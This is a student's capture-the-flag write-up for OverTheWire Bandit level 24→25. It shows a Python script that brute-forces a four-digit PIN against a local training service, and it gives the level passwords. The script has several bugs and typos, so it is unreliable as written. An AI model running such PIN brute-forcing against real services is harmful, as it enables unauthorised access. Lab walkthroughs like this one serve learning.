# overthewire writeup
Zachery Lorch

### Leve24->level25
1. connect to server using ssh protcol

```bash
ssh bandit25@bandit.labs.overthewire.ord -p 2220
```
2. entering in the password *pervious flag*

3. so we know we are going to have to make a script to guess all the numbers
yet when you just make a .txt file of all the possible outputs the connection times
out so the script must connect to the socket in the code
 here is my pyhton script
```
import socket

s =socket.socket()
s.connect(('localhost', 30002))

password= UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

for i in range(10):
	for k in range(10):
		for j in range(10):
			for p in range(10):
				
				pin = str(str(i) + str(k) + str(j) +str(p))
				s.sendall(password + ' ' + str(pin) + '\n')
				message = s.recv(1024)
				
				if 'Wrong' in message:
					contunie
				else:
					print(message)
					break
s.close

flag: uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG